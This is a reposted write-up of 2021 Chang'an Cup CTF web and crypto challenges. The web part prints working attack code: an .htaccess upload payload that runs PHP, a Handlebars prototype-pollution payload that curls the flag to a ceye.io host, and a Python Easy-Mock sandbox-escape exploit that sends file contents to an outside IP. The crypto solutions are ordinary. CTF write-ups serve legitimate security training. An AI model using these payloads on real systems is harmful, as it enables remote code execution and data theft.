2021长安杯|Web & Crypto 部分wp合集

admin
admin
admin
140350
文章
117
评论
2021年9月24日10:25:50评论589 views字数 7816阅读26分3秒阅读模式


web方向


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I


K1ng_in_h3Ap_I





1. noupload

允许上传png、htaccess
2021长安杯|Web & Crypto 部分wp合集

2021长安杯|Web & Crypto 部分wp合集
<Files ~ "^.ht">        Require all granted        Order allow,deny        Allow from allphp_flag engine on</Files>SetHandler application/x-httpd-php # <?=`cat /flag` ?>


2.  SimpleHub

Status可以污染{{this.constructor}}
https://snyk.io/vuln/SNYK-JS-HANDLEBARS-1056767

2021长安杯|Web & Crypto 部分wp合集

{{#with (__lookupGetter__ "__proto__")}} {{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} {{#with ../constructor.prototype}} {{../../constructor.defineProperty . "hasOwnProperty" ..}} {{/with}} {{/with}} {{/with}} {{#with "constructor"}} {{#with split}} {{pop (push "global.process.mainModule.constructor._load('child_process').exec('curl -X POST -A `cat /flag` http://fto41s.ceye.io);")}} {{#with .}} {{#with (concat (lookup join (slice 0 1)))}} {{#each (slice 2 3)}} {{#with (apply 0 ../..)}} {{.}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}}


3.  EasyMock

import requestsimport jsonimport randomimport string
target = ' http://0c1b8228.yunyansec.com/' username = ''.join(random.sample(string.ascii_letters + string.digits, 8))password = ''.join(random.sample(string.ascii_letters + string.digits, 8))print(username)print(password)# can't see the result of commandcmd = 'curl http://118.25.154.15:9999/`cat /flag`'
# registerurl = target + "/api/u/register"cookies = {"SSO_LANG_V2": "EN"}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}json_data={"name": username, "password": password}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# loginurl = target + "/api/u/login"cookies = {"SSO_LANG_V2": "EN"}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}json_data={"name": username, "password": password}req = requests.post(url, headers=headers, cookies=cookies, json=json_data).textlogin = json.loads(req)token = login['data']['token']
# create projecturl = target + "/api/project/create"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_idurl = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}req = requests.get(url, headers=headers, cookies=cookies).textprojects = json.loads(req)project_id = projects['data'][0]['_id']
# create mockurl = target + "/api/mock/create"cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}json_data={"description": "poc", "method": "get", "mode": "{n  'foo': 'Syntax Demo',n  'name': function() {n    return (function() {n      TypeError.prototype.get_process = f => f.constructor("return process")();n      try {n        Object.preventExtensions(Buffer.from("")).a = 1;n      } catch (e) {n        return e.get_process(() => {}).mainModule.require("child_process").execSync("" + cmd + "").toString();n      }n    })();n  }n}", "project_id": project_id, "url": "/" + username}requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mockurl = target + "/mock/{}/{}/{}".format(project_id,username,username)cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}requests.get(url, headers=headers, cookies=cookies)

2021长安杯|Web & Crypto 部分wp合集




crypto方向





1.  EzPy

20进制转回去,然后在256下乘以233的逆。

至于取一位还是两位,手撸,眼看。

from Crypto.Util.number import inverseflag=""dd=['4A', '65', '8B', '0F', '5J', '44', '5J', '2A', '3D', '2A', '1D', '5J', '17', '88', '3D', '7D', '7D', 'BH', '1A', '9B', 'BH', '5J', '78', '7','5J', 'C0', '9E', '3D', '17', '78', '75', '17', 'BH', '5J', '2A', '3D', '8B', '75', '17', '5J', '3D', '3G', '9B', '7', '9E', '75', '78', '88', '2D', '5J', '3D', '1A', '4', '5J', '4', 'BH', '2D', '8G', '1A', '8B', '78', '9E', '3D', '78', 'BH', '5J', '3D', '1A', '5J', '8G', '52', 'BH', '9E', 'AE', '3G', '7', '3J', '5J', '75', '1A', '5J', 'CE', '65', '2D', 'A8', '1D']for each in dd:  tmp = chr(int(each,20) * inverse(233,256)%256)  flag += tmpprint(flag)


2.  checkin

利用2^e-pow(2,e,n)获取kn,爆破p获取kq,分解kq得到q,rsa解密,威尔逊走一波。

from Crypto.Util.number import *e = 1049x = 4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377c = 3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270n = (pow(2,e) - x)for q in range(2**15,2**16):  if n % q == 0:    break
p = n // q# yafup = 170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231d = inverse(e,(p-1)*(q-1))m = pow(c,d,n)for i in range(p-q,p):  m = m*i % pprint(long_to_bytes(-m%p))



- END -
2021长安杯|Web & Crypto 部分wp合集

2021长安杯|Web & Crypto 部分wp合集


相关推荐: 上车出发!E安全带你逛“互联网之光”博览会

介绍      由国家网信办和浙江省政府共同举办的2021年世界互联网大会乌镇峰会,将于9月26日至28日在浙江乌镇召开。本届博览会以“迈向数字文明新时代——携手构建网络空间命运共同体”为主题。     &nb…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月24日10:25:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2021长安杯|Web & Crypto 部分wp合集https://cn-sec.com/archives/555298.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息